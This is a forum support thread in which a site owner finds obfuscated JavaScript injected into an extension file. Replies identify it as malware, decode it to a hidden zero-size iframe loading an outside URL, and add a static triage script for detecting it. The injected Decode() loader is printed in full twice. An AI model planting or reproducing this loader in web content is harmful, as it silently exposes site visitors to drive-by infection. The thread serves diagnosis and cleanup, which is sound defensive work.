What is this file???

16 years 8 months ago #15713 by ronildo
What is this file??? was created by ronildo
Guys, I'm using this great tool, but I guess my website is being hacked.
And I would like to know what's happening with this file "gz_eolas_fix.js".

Normally it looks like this:
function writethis(what) {
	document.write(what);
}
What is this function??


And later it looks like this:
function writethis(what) {
	document.write(what);
}
function Decode()
{
	var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
	str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
	str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
	str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
	str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
	l=str.length;
	while(c<=str.length-1)
	{
		while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
		c++;out=out+String.fromCharCode(temp);temp="";
	}
document.write(out);
}
Decode();

I'm sorry for my bad English... lol

16 years 8 months ago #15714 by Xyborg
Replied by Xyborg on topic Re: What is this file???
Hi, I just came here googling for the text "str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";". I'm doing malware research and I can assure you that the following function is executing an exploit to infect the users who visit your website. Please remove the function Decode ASAP.

function Decode()
{
var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";
str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";
str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";
str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";
str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;out=out+String.fromCharCode(temp);temp="";
}
document.write(out);
}
Decode();


Are you hosting your website on Dreamhost? I'm asking because I found a lot of infected websites on DH, and I want to know if this is a massive attack or something else.

Please post the date of the last modification of the file gz_eolas_fix.js :)

16 years 8 months ago - 16 years 8 months ago #15715 by ronildo
Replied by ronildo on topic Re: What is this file???
Yeah... I'm hosting on Dreamhost.
Every time that I remove the code, they put it back again.

I will search for the date of the modification.

16 years 7 months ago #15716 by HIGMoose
Replied by HIGMoose on topic Re: What is this file???
The function translates the decimal into ASCII with ! as a delimiter...

Thus, it becomes...
<iframe src="theothersize.com/Mouse/" width=0 height=0 frameborder=0>

So, when it is run it inserts an iframe to that URL location.

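The decoding described in the reply above can be done statically, without ever running the injected script. This is an added example, not part of the original thread or of AllVideos; it assumes Node.js, and the function names (`extractEncodedRun`, `decodeRun`, `findHiddenIframes`, `triage`) are hypothetical. The sample input is the string pieces posted in this thread.

```javascript
// Static triage of "!"-delimited char-code obfuscation (added example).
// The suspect script is only read as text; it is never eval'd or written to a page.
const SAMPLE = [
  'function Decode(){',
  'var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61";',
  'str+="!34!104!116!116!112!58!47!47!116!104!101!111!116!104!101!114!115!105!122";',
  'str+="!101!46!99!111!109!47!77!111!117!115!101!47!34!32!119!105!100!116!104!61";',
  'str+="!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100";',
  'str+="!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";',
  "while(str.charAt(c)!='!')temp=temp+str.charAt(c++);",
  'document.write(out);}',
].join('\n');

// Collect, in source order, every quoted literal made only of digits and the delimiter.
function extractEncodedRun(source, delim = '!') {
  const esc = delim.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
  const literal = new RegExp(`(["'])((?:\\d|${esc})+)\\1`, 'g');
  let run = '';
  for (const m of source.matchAll(literal)) {
    if (/\d/.test(m[2])) run += m[2]; // skip the bare '!' used in the loop condition
  }
  return run;
}

// Turn "60!105!..." into text, one decimal char code per field.
function decodeRun(run, delim = '!') {
  return run.split(delim).filter(Boolean)
    .map((n) => String.fromCharCode(Number(n))).join('');
}

// Report the src of every iframe with a zero width or height (invisible to the visitor).
function findHiddenIframes(html) {
  const hits = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const zeroSized = /\b(?:width|height)\s*=\s*["']?0\b/i.test(m[0]);
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[0]);
    if (zeroSized) hits.push(src ? src[1] : '(no src)');
  }
  return hits;
}

function triage(source) {
  const decoded = decodeRun(extractEncodedRun(source));
  return { decoded, hiddenFrames: findHiddenIframes(decoded) };
}

console.log(triage(SAMPLE));
```

Running the same `triage` over every `.js` file under the web root after a cleanup shows whether the injection has come back.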
16 years 7 months ago #15717 by ronildo
Replied by ronildo on topic Re: What is this file???
My problem was permissions in the folders.

16 years 7 months ago #15718 by JoomlaWorks
Replied by JoomlaWorks on topic Re: What is this file???
This function was used to bypass the notorious EOLAS issue ("click to activate"), concerning video playback on IE browsers. This is now NOT used on the 2.5.x series of AllVideos, we use other methods to bypass EOLAS (although Microsoft has cut a deal with EOLAS to remove this "click to activate" issue on IE).

Fotis / JoomlaWorks Support Team
---
Please search the forum before posting a new topic :)
